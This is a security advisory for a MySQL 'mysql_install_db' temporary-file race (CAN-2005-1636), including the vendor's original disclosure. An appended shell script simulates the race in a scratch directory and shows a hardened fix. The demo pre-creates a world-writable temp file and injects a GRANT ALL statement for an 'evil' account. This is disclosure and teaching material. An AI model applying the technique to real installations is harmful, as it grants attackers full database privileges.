MySQL 'mysql_install_db' Uses Unsafe Temporary Files and May Let Local Users Gain Elevated Privilege
SecurityTracker Alert ID: 1013995
SecurityTracker URL: http://securitytracker.com/id?1013995
CVE Reference: CAN-2005-1636
Updated: Oct 5 2005
Original Entry Date: May 18 2005
Impact: User access via local system
Fix Available: Yes
Vendor Confirmed: Yes
Version(s): prior to 4.1.12; 5.0 - 5.0.4
Description: Eric Romang (ZATAZ) reported a vulnerability in MySQL. A local user can modify the database during database installation.
The 'mysql_install_db' script writes its SQL bootstrap input to the temporary file '/tmp/mysql_install_db.$$' in the shared /tmp directory: the name is predictable (it is the script's own PID), the file is created with a plain shell redirection rather than with a safe, exclusive create, and the script then reads the file back to feed the server's bootstrap command. A local user who pre-creates that file, or writes to it between the script's write and its read, can inject SQL statements that are executed during database creation, for example to create database accounts with elevated privileges.
The vendor was notified on May 9, 2005.
The original advisory is available at:
http://www.zataz.net/adviso/mysql-05172005.txt
Impact: A local user can create database accounts with elevated privileges in certain cases.
Solution: The vendor has released a fixed version (4.1.12), available at:
http://dev.mysql.com/downloads/
The specific Bitkeeper reference for this bug is available at:
http://mysql.bkbits.net:8080/mysql-4.1/cset@1.2250?nav=index.html|ChangeSet@-1d
Red Hat has issued a fix for Red Hat Enterprise Linux 4:
https://rhn.redhat.com/errata/RHSA-2005-685.html
Vendor URL: www.mysql.com/products/mysql/
Cause: Access control error, State error
Underlying OS: Linux (Any), UNIX (Any)
Reported By: "ZATAZ.net" <exploits@zataz.net>
Message History:
This archive entry has one or more follow-up message(s) listed below.
Source Message Contents
Date: Tue, 17 May 2005 12:46:29 +0200
From: "ZATAZ.net" <exploits@zataz.net>
Subject: MySQL < 4.0.12 && MySQL <= 5.0.4 : Insecure tmp file handling
#########################################################
MySQL mysql_install_db data manipulation
vendor: http://www.mysql.com
advisory: http://www.zataz.net/adviso/mysql-05172005.txt
vendor informed: yes
exploit available: no
#########################################################
MySQL contains a security flaw that could allow a malicious local attacker to inject arbitrary SQL commands during the database creation process.
For example: a malicious local attacker could create a MySQL account accessible locally (or from everywhere) with ALL privileges on all databases.
##########
versions:
##########
MySQL < 4.0.12
MySQL <= 5.0.4
##########
Solution:
##########
For MySQL 4.0.x, update to the new version 4.0.12.
MySQL 5.0.4 still vulnerable.
#########
timeline:
#########
discovered : 2005-05-07
vendor notified : 2005-05-09
vendor response : 2005-05-09
vendor fix : 2005-05-17
disclosure : 2005-05-17
#####################
Technical details :
#####################
tmp_file=/tmp/mysql_install_db.$$
Then on:
226 echo "use mysql;" > $tmp_file
227 cat $tmp_file $fill_help_tables | eval "$mysqld_install_cmd_line"
228 res=$?
229 rm $tmp_file
#####################
Credits :
#####################
Eric Romang (eromang@zataz.net - ZATAZ)
Thxs to Gentoo Security Team. (Taviso, Sune, jaervosz, etc.)
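The pattern quoted in the technical details above (a predictable '/tmp/mysql_install_db.$$' written with a plain redirection, then read back into the bootstrap command) replayed and then fixed in a small shell script. This is an added example, not MySQL's code and not part of the ZATAZ advisory: it runs in a private scratch directory instead of /tmp, substitutes `cat` for `mysqld --bootstrap` so the SQL that would have been executed is simply returned, and both the attacker's GRANT statement and the help-table row are constructed. The hardened variant is one possible fix; the page does not say what change the vendor shipped in 4.1.12, so it is not presented as that change.

```shell
#!/bin/sh
# Added example, not MySQL's or ZATAZ's code. Replays the mysql_install_db
# temp-file weakness from the advisory inside a private scratch directory,
# then shows a hardened variant. Attacker and installer are the same user
# here, which is enough to show the mechanism: '>' on an existing path
# truncates it in place and keeps inode, owner and mode, so whoever
# pre-created the file can still write to it after the installer's echo.
# The attacker's GRANT statement and the help-table row are constructed data.
set -u

SCRATCH=$(mktemp -d)                       # stands in for the shared /tmp
trap 'rm -rf "$SCRATCH"' EXIT
FILL_HELP=$SCRATCH/fill_help_tables.sql    # stands in for $fill_help_tables
printf 'INSERT INTO help_topic VALUES (1);\n' > "$FILL_HELP"
ATTACKER_SQL="GRANT ALL ON *.* TO 'evil'@'%' IDENTIFIED BY 'x' WITH GRANT OPTION;"

# Stand-in for:  cat $tmp_file $fill_help_tables | eval "$mysqld_install_cmd_line"
# Instead of driving mysqld --bootstrap it returns the SQL that would have run.
bootstrap_sql() { cat "$@"; }

# The pattern from the advisory. $1 plays the installer's $$; $2 is a command
# the local attacker gets to run in the window between the echo and the cat.
vulnerable_install() {
    pid=$1; race_cmd=$2
    tmp_file=$SCRATCH/mysql_install_db.$pid   # predictable: the PID shows up in ps
    echo "use mysql;" > "$tmp_file"           # truncates; does not create a fresh file
    eval "$race_cmd"                          # the window
    bootstrap_sql "$tmp_file" "$FILL_HELP"
    rm -f "$tmp_file"
}

# Hardened: no file with a guessable name is created at all. The header is
# generated in the same pipeline that feeds the bootstrap, so a local user has
# nothing to pre-create and no window to race. (One possible fix, not
# necessarily the one shipped in 4.1.12.)
hardened_install() {
    { echo "use mysql;"; cat "$FILL_HELP"; } | bootstrap_sql
}

# Attacker's side: guess (or spray) the PID, pre-create the file world-writable,
# then append once the installer has written its header. Returns the SQL the
# installer ended up executing.
demo_vulnerable() {
    pid=4242
    tmp_file=$SCRATCH/mysql_install_db.$pid
    : > "$tmp_file"
    chmod 666 "$tmp_file"                     # survives the installer's truncation
    vulnerable_install "$pid" "printf '%s\n' \"\$ATTACKER_SQL\" >> '$tmp_file'"
}

# Same attacker, hardened installer: there is no path to pre-create.
demo_hardened() {
    hardened_install
}

# True when a transcript contains the attacker's injected statement.
sql_was_injected() {
    case "$1" in *"GRANT ALL"*) return 0 ;; *) return 1 ;; esac
}

if [ "${1:-}" = "--demo" ]; then
    echo "--- SQL fed to mysqld by the vulnerable installer:"; demo_vulnerable
    echo "--- SQL fed to mysqld by the hardened installer:";   demo_hardened
fi
```

Run it with `sh demo.sh --demo` to see both transcripts. The detail worth noticing is the chmod 666 before the installer runs: because `>` on an existing path truncates rather than replaces the file, the installer's own write leaves the attacker's ownership and permissions intact, so the attacker only has to append during the window between the echo and the cat rather than win a create-time race. A 0600 file from `mktemp` in a directory only the installing user can write would also close the hole; dropping the temporary file altogether, as above, is simpler still.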